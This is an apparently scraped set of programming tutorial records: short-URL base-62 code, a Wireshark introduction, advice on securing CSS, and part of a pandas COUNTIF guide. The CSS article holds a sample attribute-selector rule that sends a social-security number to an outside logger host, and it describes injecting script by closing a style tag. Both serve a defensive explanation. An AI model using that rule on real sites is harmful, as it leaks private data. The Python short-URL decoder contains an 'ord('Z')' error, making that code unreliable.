'z') id = id * 62 + shortURL.charAt(i) - 'a'; if ('A' <= shortURL.charAt(i) && shortURL.charAt(i) <= 'Z') id = id * 62 + shortURL.charAt(i) - 'A' + 26; if ('0' <= shortURL.charAt(i) && shortURL.charAt(i) <= '9') id = id * 62 + shortURL.charAt(i) - '0' + 52; } return id; } // Driver Code public static void main (String[] args) throws IOException { int n = 12345; String shorturl = idToShortURL(n); System.out.println(\"Generated short url is \" + shorturl); System.out.println(\"Id from url is \" + shortURLtoID(shorturl)); }} // This code is contributed by shubham96301", "e": 5206, "s": 3246, "text": null }, { "code": "# Python3 code for above approach def idToShortURL(id): map = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\" shortURL = \"\" # for each digit find the base 62 while(id > 0): shortURL += map[id % 62] id //= 62 # reversing the shortURL return shortURL[len(shortURL): : -1] def shortURLToId(shortURL): id = 0 for i in shortURL: val_i = ord(i) if(val_i >= ord('a') and val_i <= ord('z')): id = id*62 + val_i - ord('a') elif(val_i >= ord('A') and val_i <= ord('Z')): id = id*62 + val_i - ord('Z') + 26 else: id = id*62 + val_i - ord('0') + 52 return id if (__name__ == \"__main__\"): id = 12345 shortURL = idToShortURL(id) print(\"Short URL from 12345 is : \", shortURL) print(\"ID from\", shortURL, \"is : \", shortURLToId(shortURL))", "e": 6068, "s": 5206, "text": null }, { "code": "// C# program to generate short url from integer id and // integer id back from short url. using System; public class GFG{ // Function to generate a short url from integer ID static String idToShortURL(int n) { // Map to store 62 possible characters char []map = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\".ToCharArray(); String shorturl = \"\"; // Convert given integer id to a base 62 number while (n > 0) { // use above map to store actual character // in short url shorturl+=(map[n % 62]); n = n / 62; } // Reverse shortURL to complete base conversion return reverse(shorturl); } static String reverse(String input) { char[] a = input.ToCharArray(); int l, r = a.Length - 1; for (l = 0; l < r; l++, r--) { char temp = a[l]; a[l] = a[r]; a[r] = temp; } return String.Join(\"\",a); } // Function to get integer ID back from a short url static int shortURLtoID(String shortURL) { int id = 0; // initialize result // A simple base conversion logic for (int i = 0; i < shortURL.Length; i++) { if ('a' <= shortURL[i] && shortURL[i] <= 'z') id = id * 62 + shortURL[i] - 'a'; if ('A' <= shortURL[i] && shortURL[i] <= 'Z') id = id * 62 + shortURL[i] - 'A' + 26; if ('0' <= shortURL[i] && shortURL[i] <= '9') id = id * 62 + shortURL[i] - '0' + 52; } return id; } // Driver Code public static void Main(String[] args) { int n = 12345; String shorturl = idToShortURL(n); Console.WriteLine(\"Generated short url is \" + shorturl); Console.WriteLine(\"Id from url is \" + shortURLtoID(shorturl)); }} // This code is contributed by 29AjayKumar", "e": 8134, "s": 6068, "text": null }, { "code": "<script>// Javascript program to generate short url from integer id and// integer id back from short url. // Function to generate a short url from integer IDfunction idToShortURL(n) { // Map to store 62 possible characters let map = \"abcdefghijklmnopqrstuvwxyzABCDEF\" \"GHIJKLMNOPQRSTUVWXYZ0123456789\"; let shorturl = []; // Convert given integer id to a base 62 number while (n) { // use above map to store actual character // in short url shorturl.push(map[n % 62]); n = Math.floor(n / 62); } // Reverse shortURL to complete base conversion shorturl.reverse(); return shorturl.join(\"\");} // Function to get integer ID back from a short urlfunction shortURLtoID(shortURL) { let id = 0; // initialize result // A simple base conversion logic for (let i = 0; i < shortURL.length; i++) { if ('a' <= shortURL[i] && shortURL[i] <= 'z') id = id * 62 + shortURL[i].charCodeAt(0) - 'a'.charCodeAt(0); if ('A' <= shortURL[i] && shortURL[i] <= 'Z') id = id * 62 + shortURL[i].charCodeAt(0) - 'A'.charCodeAt(0) + 26; if ('0' <= shortURL[i] && shortURL[i] <= '9') id = id * 62 + shortURL[i].charCodeAt(0) - '0'.charCodeAt(0) + 52; } return id;} // Driver program to test above function let n = 12345;let shorturl = idToShortURL(n);document.write(\"Generated short url is \" + shorturl + \"<br>\");document.write(\"Id from url is \" + shortURLtoID(shorturl)); // This code is contributed by gfgking.</script>", "e": 9672, "s": 8134, "text": null }, { "code": null, "e": 9720, "s": 9672, "text": "Generated short url is dnh\nId from url is 12345" }, { "code": null, "e": 9766, "s": 9720, "text": "Time complexity : O(n) Auxiliary Space : O(1)" }, { "code": null, "e": 9967, "s": 9766, "text": "Optimization: We can avoid reverse step in idToShortURL(). To make sure that we get the same ID back, we also need to change shortURLtoID() to process characters from the end instead of the beginning." }, { "code": null, "e": 9981, "s": 9967, "text": "shubham_singh" }, { "code": null, "e": 9994, "s": 9981, "text": "Akanksha_Rai" }, { "code": null, "e": 10007, "s": 9994, "text": "nobody_cares" }, { "code": null, "e": 10019, "s": 10007, "text": "whiteknight" }, { "code": null, "e": 10027, "s": 10019, "text": "gfgking" }, { "code": null, "e": 10039, "s": 10027, "text": "29AjayKumar" }, { "code": null, "e": 10055, "s": 10039, "text": "youmailmahibagi" }, { "code": null, "e": 10072, "s": 10055, "text": "hardikkoriintern" }, { "code": null, "e": 10077, "s": 10072, "text": "Hike" }, { "code": null, "e": 10087, "s": 10077, "text": "Microsoft" }, { "code": null, "e": 10111, "s": 10087, "text": "Advanced Data Structure" }, { "code": null, "e": 10118, "s": 10111, "text": "Arrays" }, { "code": null, "e": 10126, "s": 10118, "text": "Strings" }, { "code": null, "e": 10136, "s": 10126, "text": "Microsoft" }, { "code": null, "e": 10141, "s": 10136, "text": "Hike" }, { "code": null, "e": 10148, "s": 10141, "text": "Arrays" }, { "code": null, "e": 10156, "s": 10148, "text": "Strings" } ]
Introduction to Wireshark
02 Dec, 2021 Wireshark is a software tool used to monitor the network traffic through a network interface. It is the most widely used network monitoring tool today. Wireshark is loved equally by system administrators, network engineers, network enthusiasts, network security professionals and black hat hackers. The extent of its popularity is such, that experience with Wireshark is considered as a valuable/essential trait in a computer networking-related professional. It has a great GUI as well as a conventional CLI(T Shark).It offers network monitoring on almost all types of network standards (ethernet, wlan, Bluetooth etc)It is open-source with a large community of backers and developers.All the necessary components for monitoring, analyzing and documenting the network traffic are present. It is free to use. It has a great GUI as well as a conventional CLI(T Shark). It offers network monitoring on almost all types of network standards (ethernet, wlan, Bluetooth etc) It is open-source with a large community of backers and developers. All the necessary components for monitoring, analyzing and documenting the network traffic are present. It is free to use. Wireshark was started with the intention of developing a tool for closely analyzing network packets. It was started by Gerald Combez in 1997. Its initial name was Ethereal. It was initially released in July 1998 as version 0.2.0. Due to the support it got from the developer community, it grew rapidly and was released as version 1.0 in 2008, almost two years after it was renamed to Wireshark. Windows : You can do a proper installation or run Wireshark as a portable app on your windows system. To download the installation executable or the portable app go to Wireshark Downloads Run the executable and follow on-screen instructions to complete the installation. Install using your package manager. See the manual for your package manager for correct syntax. Most Debian Linux OS have apt(advanced packaging tool) package manager pre-installed. Similarly Fedora family of OS have “yum” package manager pre-installed. The generic command is html <package-manager-name> install Wireshark Open terminal in your system or press ALT + CTRL + T and run the below command: sudo add-apt-repository ppa:wireshark-dev/stable Update the repository: sudo apt-get update Install wire shark using the below command: sudo apt-get install wireshark To run the wire shark use the below command sudo wireshark You can opt for a security-based Linux OS that has Wireshark pre-installed, like Kali Linux. Packet Monitor: This segment visually shows the packets flowing inside the network. There are color codes for each type of packet. The packets are shown with the following information : 1. Source address 2. Destination address 3. Packet type 4. Hex dump of the packet 5. Contents of the packet in text 6. Source port(if applicable) 7. Destination port(if applicable) Import from a capture file: This feature lets you import packets dump from a capture file to analyse further. There are many formats supported by Wireshark, some of them are: pcapng libpcap Oracle snoop and atmsnoop Finisar (previously Shomiti) Surveyor captures Microsoft Network Monitor captures Novell LANalyzer captures AIX iptrace captures Cinco Networks NetXray captures Network Associates Windows-based Sniffer and Sniffer Pro captures Network General/Network Associates DOS-based Sniffer (compressed or uncompressed) captures AG Group/WildPackets/Savvius EtherPeek/TokenPeek/AiroPeek/EtherHelp/PacketGrabber captures RADCOM’s WAN/LAN Analyzer captures Network Instruments Observer version 9 captures Lucent/Ascend router debug output HP-UX’s nettl Toshiba’s ISDN routers dump output ISDN4BSD i4btrace utility Traces from the EyeSDN USB S0 IPLog format from the Cisco Secure Intrusion Detection System the output from VMS’s TCPIPtrace/TCPtrace/UCX$TRACE utilities the text output from the DBS Etherwatch VMS utility Visual Networks’ Visual UpTime traffic capture the output from CoSine L2 debug the output from Accellent’s 5Views LAN agents Endace Measurement Systems’ ERF format captures Linux Bluez Bluetooth stack hcidump -w traces Catapult DCT2000 .out files Gammu generated text output from Nokia DCT3 phones in Netmonitor mode IBM Series (OS/400) Comm traces (ASCII & UNICODE) Juniper Netscreen snoop captures Symbian OS btsnoop captures Tamosoft CommView captures Textronix K12xx 32bit .rf5 format captures Textronix K12 text file format captures Apple PacketLogger captures Captures from Aethra Telecommunications’ PC108 software Export to a capture file: Wireshark lets you save the results as a capture file to continue working on them at later point of time. The supported formats are: pcapng (*.pcapng) libpcap, tcpdump and various other tools using tcpdump’s capture format (*.pcap, *.cap, *.dmp) Accellent 5Views (*.5vw) HP-UX’s nettl (*.TRC0, *.TRC1) Microsoft Network Monitor – NetMon (*.cap) Network Associates Sniffer – DOS (*.cap, *.enc, *.trc, *fdc, *.syc) Network Associates Sniffer – Windows (*.cap) Network Instruments Observer version 9 (*.bfr) Novell LANalyzer (*.tr1) Oracle (previously Sun) snoop (*.snoop, *.cap) Visual Networks Visual UpTime traffic (*.*). As a beginner, you should focus only on familiarising yourself with the basics of Wireshark UI and other basics( the formats given here are for giving a glance, you don’t have to do anything with them at this time). With these basics done you can now start playing around with the tool. Launch Wireshark, select an interface( select one that is currently communicating, which can be verified by the zigzag pattern in front of the name of the interface) and click on the fin icon to start capturing packets. Save the result as a capture file and exit after you are done seeing the traffic. This concludes the fundamentals. bunny09262002 GBlog Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n02 Dec, 2021" }, { "code": null, "e": 328, "s": 28, "text": "Wireshark is a software tool used to monitor the network traffic through a network interface. It is the most widely used network monitoring tool today. Wireshark is loved equally by system administrators, network engineers, network enthusiasts, network security professionals and black hat hackers. " }, { "code": null, "e": 489, "s": 328, "text": "The extent of its popularity is such, that experience with Wireshark is considered as a valuable/essential trait in a computer networking-related professional. " }, { "code": null, "e": 838, "s": 489, "text": "It has a great GUI as well as a conventional CLI(T Shark).It offers network monitoring on almost all types of network standards (ethernet, wlan, Bluetooth etc)It is open-source with a large community of backers and developers.All the necessary components for monitoring, analyzing and documenting the network traffic are present. It is free to use." }, { "code": null, "e": 897, "s": 838, "text": "It has a great GUI as well as a conventional CLI(T Shark)." }, { "code": null, "e": 999, "s": 897, "text": "It offers network monitoring on almost all types of network standards (ethernet, wlan, Bluetooth etc)" }, { "code": null, "e": 1067, "s": 999, "text": "It is open-source with a large community of backers and developers." }, { "code": null, "e": 1190, "s": 1067, "text": "All the necessary components for monitoring, analyzing and documenting the network traffic are present. It is free to use." }, { "code": null, "e": 1586, "s": 1190, "text": "Wireshark was started with the intention of developing a tool for closely analyzing network packets. It was started by Gerald Combez in 1997. Its initial name was Ethereal. It was initially released in July 1998 as version 0.2.0. Due to the support it got from the developer community, it grew rapidly and was released as version 1.0 in 2008, almost two years after it was renamed to Wireshark. " }, { "code": null, "e": 1598, "s": 1586, "text": "Windows : " }, { "code": null, "e": 1776, "s": 1598, "text": "You can do a proper installation or run Wireshark as a portable app on your windows system. To download the installation executable or the portable app go to Wireshark Downloads" }, { "code": null, "e": 1859, "s": 1776, "text": "Run the executable and follow on-screen instructions to complete the installation." }, { "code": null, "e": 2136, "s": 1859, "text": "Install using your package manager. See the manual for your package manager for correct syntax. Most Debian Linux OS have apt(advanced packaging tool) package manager pre-installed. Similarly Fedora family of OS have “yum” package manager pre-installed. The generic command is" }, { "code": null, "e": 2141, "s": 2136, "text": "html" }, { "code": "<package-manager-name> install Wireshark", "e": 2182, "s": 2141, "text": null }, { "code": null, "e": 2262, "s": 2182, "text": "Open terminal in your system or press ALT + CTRL + T and run the below command:" }, { "code": null, "e": 2311, "s": 2262, "text": "sudo add-apt-repository ppa:wireshark-dev/stable" }, { "code": null, "e": 2334, "s": 2311, "text": "Update the repository:" }, { "code": null, "e": 2354, "s": 2334, "text": "sudo apt-get update" }, { "code": null, "e": 2398, "s": 2354, "text": "Install wire shark using the below command:" }, { "code": null, "e": 2429, "s": 2398, "text": "sudo apt-get install wireshark" }, { "code": null, "e": 2473, "s": 2429, "text": "To run the wire shark use the below command" }, { "code": null, "e": 2488, "s": 2473, "text": "sudo wireshark" }, { "code": null, "e": 2581, "s": 2488, "text": "You can opt for a security-based Linux OS that has Wireshark pre-installed, like Kali Linux." }, { "code": null, "e": 2948, "s": 2581, "text": "Packet Monitor: This segment visually shows the packets flowing inside the network. There are color codes for each type of packet. The packets are shown with the following information : 1. Source address 2. Destination address 3. Packet type 4. Hex dump of the packet 5. Contents of the packet in text 6. Source port(if applicable) 7. Destination port(if applicable)" }, { "code": null, "e": 3123, "s": 2948, "text": "Import from a capture file: This feature lets you import packets dump from a capture file to analyse further. There are many formats supported by Wireshark, some of them are:" }, { "code": null, "e": 3130, "s": 3123, "text": "pcapng" }, { "code": null, "e": 3138, "s": 3130, "text": "libpcap" }, { "code": null, "e": 3164, "s": 3138, "text": "Oracle snoop and atmsnoop" }, { "code": null, "e": 3211, "s": 3164, "text": "Finisar (previously Shomiti) Surveyor captures" }, { "code": null, "e": 3246, "s": 3211, "text": "Microsoft Network Monitor captures" }, { "code": null, "e": 3272, "s": 3246, "text": "Novell LANalyzer captures" }, { "code": null, "e": 3293, "s": 3272, "text": "AIX iptrace captures" }, { "code": null, "e": 3325, "s": 3293, "text": "Cinco Networks NetXray captures" }, { "code": null, "e": 3391, "s": 3325, "text": "Network Associates Windows-based Sniffer and Sniffer Pro captures" }, { "code": null, "e": 3482, "s": 3391, "text": "Network General/Network Associates DOS-based Sniffer (compressed or uncompressed) captures" }, { "code": null, "e": 3573, "s": 3482, "text": "AG Group/WildPackets/Savvius EtherPeek/TokenPeek/AiroPeek/EtherHelp/PacketGrabber captures" }, { "code": null, "e": 3608, "s": 3573, "text": "RADCOM’s WAN/LAN Analyzer captures" }, { "code": null, "e": 3656, "s": 3608, "text": "Network Instruments Observer version 9 captures" }, { "code": null, "e": 3690, "s": 3656, "text": "Lucent/Ascend router debug output" }, { "code": null, "e": 3704, "s": 3690, "text": "HP-UX’s nettl" }, { "code": null, "e": 3739, "s": 3704, "text": "Toshiba’s ISDN routers dump output" }, { "code": null, "e": 3765, "s": 3739, "text": "ISDN4BSD i4btrace utility" }, { "code": null, "e": 3795, "s": 3765, "text": "Traces from the EyeSDN USB S0" }, { "code": null, "e": 3857, "s": 3795, "text": "IPLog format from the Cisco Secure Intrusion Detection System" }, { "code": null, "e": 3919, "s": 3857, "text": "the output from VMS’s TCPIPtrace/TCPtrace/UCX$TRACE utilities" }, { "code": null, "e": 3971, "s": 3919, "text": "the text output from the DBS Etherwatch VMS utility" }, { "code": null, "e": 4018, "s": 3971, "text": "Visual Networks’ Visual UpTime traffic capture" }, { "code": null, "e": 4050, "s": 4018, "text": "the output from CoSine L2 debug" }, { "code": null, "e": 4096, "s": 4050, "text": "the output from Accellent’s 5Views LAN agents" }, { "code": null, "e": 4144, "s": 4096, "text": "Endace Measurement Systems’ ERF format captures" }, { "code": null, "e": 4190, "s": 4144, "text": "Linux Bluez Bluetooth stack hcidump -w traces" }, { "code": null, "e": 4218, "s": 4190, "text": "Catapult DCT2000 .out files" }, { "code": null, "e": 4288, "s": 4218, "text": "Gammu generated text output from Nokia DCT3 phones in Netmonitor mode" }, { "code": null, "e": 4338, "s": 4288, "text": "IBM Series (OS/400) Comm traces (ASCII & UNICODE)" }, { "code": null, "e": 4371, "s": 4338, "text": "Juniper Netscreen snoop captures" }, { "code": null, "e": 4399, "s": 4371, "text": "Symbian OS btsnoop captures" }, { "code": null, "e": 4426, "s": 4399, "text": "Tamosoft CommView captures" }, { "code": null, "e": 4469, "s": 4426, "text": "Textronix K12xx 32bit .rf5 format captures" }, { "code": null, "e": 4509, "s": 4469, "text": "Textronix K12 text file format captures" }, { "code": null, "e": 4537, "s": 4509, "text": "Apple PacketLogger captures" }, { "code": null, "e": 4593, "s": 4537, "text": "Captures from Aethra Telecommunications’ PC108 software" }, { "code": null, "e": 4753, "s": 4593, "text": "Export to a capture file: Wireshark lets you save the results as a capture file to continue working on them at later point of time. The supported formats are: " }, { "code": null, "e": 4771, "s": 4753, "text": "pcapng (*.pcapng)" }, { "code": null, "e": 4866, "s": 4771, "text": "libpcap, tcpdump and various other tools using tcpdump’s capture format (*.pcap, *.cap, *.dmp)" }, { "code": null, "e": 4891, "s": 4866, "text": "Accellent 5Views (*.5vw)" }, { "code": null, "e": 4922, "s": 4891, "text": "HP-UX’s nettl (*.TRC0, *.TRC1)" }, { "code": null, "e": 4965, "s": 4922, "text": "Microsoft Network Monitor – NetMon (*.cap)" }, { "code": null, "e": 5033, "s": 4965, "text": "Network Associates Sniffer – DOS (*.cap, *.enc, *.trc, *fdc, *.syc)" }, { "code": null, "e": 5078, "s": 5033, "text": "Network Associates Sniffer – Windows (*.cap)" }, { "code": null, "e": 5125, "s": 5078, "text": "Network Instruments Observer version 9 (*.bfr)" }, { "code": null, "e": 5150, "s": 5125, "text": "Novell LANalyzer (*.tr1)" }, { "code": null, "e": 5197, "s": 5150, "text": "Oracle (previously Sun) snoop (*.snoop, *.cap)" }, { "code": null, "e": 5242, "s": 5197, "text": "Visual Networks Visual UpTime traffic (*.*)." }, { "code": null, "e": 5458, "s": 5242, "text": "As a beginner, you should focus only on familiarising yourself with the basics of Wireshark UI and other basics( the formats given here are for giving a glance, you don’t have to do anything with them at this time)." }, { "code": null, "e": 5864, "s": 5458, "text": "With these basics done you can now start playing around with the tool. Launch Wireshark, select an interface( select one that is currently communicating, which can be verified by the zigzag pattern in front of the name of the interface) and click on the fin icon to start capturing packets. Save the result as a capture file and exit after you are done seeing the traffic. This concludes the fundamentals." }, { "code": null, "e": 5878, "s": 5864, "text": "bunny09262002" }, { "code": null, "e": 5884, "s": 5878, "text": "GBlog" } ]
How to secure cascading style sheets ?
14 Jun, 2022 Before learning how to secure cascading style sheets, let us first explore what are the threats that would cause through cascading stylesheets. Threat 1: Let us assume that we are using embedded/internal CSS in our code and you are allowing a user some CSS customization, then there is a chance that the attacker could inject a JavaScript code by closing the style tag in the customizable internal CSS. Refer to the below snippet for better understanding. Code snippet: <style> /* If you have added the flexibility to customize the CSS by the user */ /* Customizable CSS </style> The attacker could add a malicious JavaScript code by closing the style tag and adding a script tag as shown below. <style> </style> <script> // Some malicious JavaScript code </script> <style> </style> This occurs in a rare case as a user might not be given the flexibility to customize the cascading stylesheets always. Threat 2: Suppose you are logged in to a website and that the site displays some sensitive information like social-security-number (ssn), then there is a chance that the attacker can get those sensitive information by using the CSS Attribute selectors. Code: input#ssn[value="999-888-777"] { background-image: url( "https://secret-site.com/logger.php?ssn=999-888-777"); } How to secure cascading stylesheets ? Proper access control level: Keep the CSS away from the access control level. By the term “Access control level” it means that the normal user will have a different CSS file while the administrator has a different CSS file. Proper care should be taken for those respective CSS files that are accessible only for a user with the proper access control level or authentication. CSS Obfuscation: The method CSS Obfuscation is to make the CSS unclear or confusing to the attacker. CSS Obfuscation can be done by using the following websites. http://cssobfuscator.com/ https://www.uglifycss.com/ Implementing the Content Security Policy (CSP): Content Security Policy (CSP) helps to detect many types of attacks like data injection attacks and cross site scripting (XSS). By this way, an extra layer of security is given from data theft, malware distribution and replacing your own contents to some stolen websites. You can configure CSP by using the meta tag as shown below. <meta http-equiv="Content-Security-Policy" charset="UTF-8" content="default-src 'self'; img-src 'self' img.example.com;"> Scanning website with vulnerability scanner: Scanning your website with a vulnerability scanner is a best practice, these scanner not just detect CSS or XSS injections, but also showcase other possible vulnerabilities in your website. Some of the online vulnerability scanners are https://pentest-tools.com/website-vulnerability-scanning/website-scanner https://sitecheck.sucuri.net/ https://www.netsparker.com/web-vulnerability-scanner/ These are some of the techniques for securing your cascading stylesheets. rkbhola5 CSS-Misc CSS Web Technologies Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n14 Jun, 2022" }, { "code": null, "e": 172, "s": 28, "text": "Before learning how to secure cascading style sheets, let us first explore what are the threats that would cause through cascading stylesheets." }, { "code": null, "e": 432, "s": 172, "text": "Threat 1: Let us assume that we are using embedded/internal CSS in our code and you are allowing a user some CSS customization, then there is a chance that the attacker could inject a JavaScript code by closing the style tag in the customizable internal CSS. " }, { "code": null, "e": 486, "s": 432, "text": "Refer to the below snippet for better understanding. " }, { "code": null, "e": 500, "s": 486, "text": "Code snippet:" }, { "code": null, "e": 617, "s": 500, "text": "<style>\n\n/* If you have added the flexibility to \n customize the CSS by the user */\n\n/* Customizable CSS\n\n</style>" }, { "code": null, "e": 733, "s": 617, "text": "The attacker could add a malicious JavaScript code by closing the style tag and adding a script tag as shown below." }, { "code": null, "e": 825, "s": 733, "text": " \n<style>\n\n</style>\n<script>\n\n// Some malicious JavaScript code\n</script>\n<style>\n\n</style>" }, { "code": null, "e": 944, "s": 825, "text": "This occurs in a rare case as a user might not be given the flexibility to customize the cascading stylesheets always." }, { "code": null, "e": 1198, "s": 944, "text": "Threat 2: Suppose you are logged in to a website and that the site displays some sensitive information like social-security-number (ssn), then there is a chance that the attacker can get those sensitive information by using the CSS Attribute selectors. " }, { "code": null, "e": 1204, "s": 1198, "text": "Code:" }, { "code": null, "e": 1322, "s": 1204, "text": "input#ssn[value=\"999-888-777\"] { \n background-image: url(\n\"https://secret-site.com/logger.php?ssn=999-888-777\");\n}" }, { "code": null, "e": 1360, "s": 1322, "text": "How to secure cascading stylesheets ?" }, { "code": null, "e": 1735, "s": 1360, "text": "Proper access control level: Keep the CSS away from the access control level. By the term “Access control level” it means that the normal user will have a different CSS file while the administrator has a different CSS file. Proper care should be taken for those respective CSS files that are accessible only for a user with the proper access control level or authentication." }, { "code": null, "e": 1897, "s": 1735, "text": "CSS Obfuscation: The method CSS Obfuscation is to make the CSS unclear or confusing to the attacker. CSS Obfuscation can be done by using the following websites." }, { "code": null, "e": 1950, "s": 1897, "text": "http://cssobfuscator.com/\nhttps://www.uglifycss.com/" }, { "code": null, "e": 2270, "s": 1950, "text": "Implementing the Content Security Policy (CSP): Content Security Policy (CSP) helps to detect many types of attacks like data injection attacks and cross site scripting (XSS). By this way, an extra layer of security is given from data theft, malware distribution and replacing your own contents to some stolen websites." }, { "code": null, "e": 2330, "s": 2270, "text": "You can configure CSP by using the meta tag as shown below." }, { "code": null, "e": 2452, "s": 2330, "text": "<meta http-equiv=\"Content-Security-Policy\"\ncharset=\"UTF-8\" content=\"default-src 'self';\nimg-src 'self' img.example.com;\">" }, { "code": null, "e": 2687, "s": 2452, "text": "Scanning website with vulnerability scanner: Scanning your website with a vulnerability scanner is a best practice, these scanner not just detect CSS or XSS injections, but also showcase other possible vulnerabilities in your website." }, { "code": null, "e": 2733, "s": 2687, "text": "Some of the online vulnerability scanners are" }, { "code": null, "e": 2890, "s": 2733, "text": "https://pentest-tools.com/website-vulnerability-scanning/website-scanner https://sitecheck.sucuri.net/ https://www.netsparker.com/web-vulnerability-scanner/" }, { "code": null, "e": 2964, "s": 2890, "text": "These are some of the techniques for securing your cascading stylesheets." }, { "code": null, "e": 2973, "s": 2964, "text": "rkbhola5" }, { "code": null, "e": 2982, "s": 2973, "text": "CSS-Misc" }, { "code": null, "e": 2986, "s": 2982, "text": "CSS" }, { "code": null, "e": 3003, "s": 2986, "text": "Web Technologies" } ]
How to Perform a COUNTIF Function in Python?
28 Nov, 2021 In this article, we will discuss how to perform a COUNTIF function in Python. We use this function to count the elements if the condition is satisfied. Notice that the word stands as COUNT + IF. That means we want to count the element if the condition that is provided is satisfied. Approach We will have a DataFrame with some columns. We will use the function sum(). The sum() function will take an Iterable value. We will have a data frame with columns containing a list of elements. Then we will pass the condition to check whether the current element satisfies it or not. sum() returns an integer value. So we will store the value and print it. Syntax The syntax of the sum() function is as follows. sum(data-list condition) Let us take an example where we have a list called myList and in the list, there are integer values. We want the number of items greater than equals 40. So we can use the sum function as follows, sum(mylist >= 40) For using two conditions, we can either use AND( & ) or OR( | ) for separating the two conditions. sum((myList) >= 40 & (myList <= 90)) # AND sum((myList) >= 40 | (myList <= 90)) # OR First, let us create a DataFrame. Here we have two columns, which are views and likes. We will keep the length of each column the same. Python3 # create a dictionarymy_data = {"views": [12, 13, 100, 80, 91], "likes": [3, 8, 23, 17, 56]} # convert to dataframemy_df = pd.DataFrame(my_data) We will use the sum() function to check if, in the list of views column, the values are greater than 30. Then the sum function will count the rows that have corresponding views greater than 30. Python3 import pandas as pd # Datamy_data = {"views": [12, 13, 100, 80, 91], "likes": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # Printing the DataFrameprint(my_df.to_string()) # Printing the number of views greater# than 30print("View greater than 30: ", sum(my_df.views > 30)) Output The sum() function to check if, in the list of likes column, the values are greater than 20. Then the sum function will count the rows that have corresponding likes greater than 20. Python3 import pandas as pd # Datamy_data = {"views": [12, 13, 100, 80, 91], "likes": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # Printing the DataFrameprint(my_df.to_string()) # Printing the number of likes greater# than 20print("Likes greater than 20: ", sum(my_df.likes > 20)) Output For satisfying two or more conditions, wrap each condition in brackets( ) and then use single & sign to separate them. Here we have only two conditions, so we need only one &. Python3 import pandas as pd # Datamy_data = {"views": [12, 13, 100, 80, 91], "likes": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # DataFrame # Printing the DataFrameprint(my_df.to_string()) # Calculating the number of views greater than 30# as well as likes less than 20sum = sum((my_df.likes < 20) & (my_df.views > 30))print("Likes less than 20 and Views more than 30: ", sum) Output We will use a single | sign to separate the conditions. | is used as either the first condition OR second OR third and so on. Python3 import pandas as pd # Datamy_data = {"views": [12, 13, 100, 80, 91], "likes": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # DataFrame # Printing the DataFrameprint(my_df.to_string()) # Calculating the number of views greater than 30# or likes less than 20sum = sum((my_df.likes < 20) | (my_df.views > 30))print("Likes less than 20 or Views more than 30: ", sum) Output Picked Python-pandas Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n28 Nov, 2021" }, { "code": null, "e": 106, "s": 28, "text": "In this article, we will discuss how to perform a COUNTIF function in Python." }, { "code": null, "e": 311, "s": 106, "text": "We use this function to count the elements if the condition is satisfied. Notice that the word stands as COUNT + IF. That means we want to count the element if the condition that is provided is satisfied." }, { "code": null, "e": 320, "s": 311, "text": "Approach" }, { "code": null, "e": 364, "s": 320, "text": "We will have a DataFrame with some columns." }, { "code": null, "e": 604, "s": 364, "text": "We will use the function sum(). The sum() function will take an Iterable value. We will have a data frame with columns containing a list of elements. Then we will pass the condition to check whether the current element satisfies it or not." }, { "code": null, "e": 677, "s": 604, "text": "sum() returns an integer value. So we will store the value and print it." }, { "code": null, "e": 684, "s": 677, "text": "Syntax" }, { "code": null, "e": 732, "s": 684, "text": "The syntax of the sum() function is as follows." }, { "code": null, "e": 757, "s": 732, "text": "sum(data-list condition)" }, { "code": null, "e": 953, "s": 757, "text": "Let us take an example where we have a list called myList and in the list, there are integer values. We want the number of items greater than equals 40. So we can use the sum function as follows," }, { "code": null, "e": 971, "s": 953, "text": "sum(mylist >= 40)" }, { "code": null, "e": 1070, "s": 971, "text": "For using two conditions, we can either use AND( & ) or OR( | ) for separating the two conditions." }, { "code": null, "e": 1155, "s": 1070, "text": "sum((myList) >= 40 & (myList <= 90)) # AND\nsum((myList) >= 40 | (myList <= 90)) # OR" }, { "code": null, "e": 1291, "s": 1155, "text": "First, let us create a DataFrame. Here we have two columns, which are views and likes. We will keep the length of each column the same." }, { "code": null, "e": 1299, "s": 1291, "text": "Python3" }, { "code": "# create a dictionarymy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]} # convert to dataframemy_df = pd.DataFrame(my_data)", "e": 1455, "s": 1299, "text": null }, { "code": null, "e": 1649, "s": 1455, "text": "We will use the sum() function to check if, in the list of views column, the values are greater than 30. Then the sum function will count the rows that have corresponding views greater than 30." }, { "code": null, "e": 1657, "s": 1649, "text": "Python3" }, { "code": "import pandas as pd # Datamy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # Printing the DataFrameprint(my_df.to_string()) # Printing the number of views greater# than 30print(\"View greater than 30: \", sum(my_df.views > 30))", "e": 1954, "s": 1657, "text": null }, { "code": null, "e": 1961, "s": 1954, "text": "Output" }, { "code": null, "e": 2143, "s": 1961, "text": "The sum() function to check if, in the list of likes column, the values are greater than 20. Then the sum function will count the rows that have corresponding likes greater than 20." }, { "code": null, "e": 2151, "s": 2143, "text": "Python3" }, { "code": "import pandas as pd # Datamy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # Printing the DataFrameprint(my_df.to_string()) # Printing the number of likes greater# than 20print(\"Likes greater than 20: \", sum(my_df.likes > 20))", "e": 2449, "s": 2151, "text": null }, { "code": null, "e": 2456, "s": 2449, "text": "Output" }, { "code": null, "e": 2632, "s": 2456, "text": "For satisfying two or more conditions, wrap each condition in brackets( ) and then use single & sign to separate them. Here we have only two conditions, so we need only one &." }, { "code": null, "e": 2640, "s": 2632, "text": "Python3" }, { "code": "import pandas as pd # Datamy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) 